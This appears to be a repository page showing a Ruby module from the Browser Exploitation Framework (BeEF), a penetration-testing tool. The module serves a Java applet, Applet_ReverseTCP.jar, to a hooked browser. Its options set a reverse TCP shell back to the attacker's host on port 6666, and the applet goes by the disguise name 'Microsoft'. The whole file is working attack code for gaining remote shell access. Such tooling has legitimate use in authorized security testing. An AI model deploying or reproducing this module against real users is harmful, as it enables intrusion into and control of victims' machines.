Files
beef/modules/exploits/local_host/java_payload/module.rb
jcrew99 486a9bb329 Update copyright 2023 (#2675)
* updated copyright

* reverted gemfile lock changes
2022-12-31 15:36:07 +10:00

27 lines
1.0 KiB
Ruby
Executable File

#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Java_payload < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
end
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.beef_host
[
{ 'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP' },
{ 'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host },
{ 'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666' },
{ 'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32) },
{ 'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end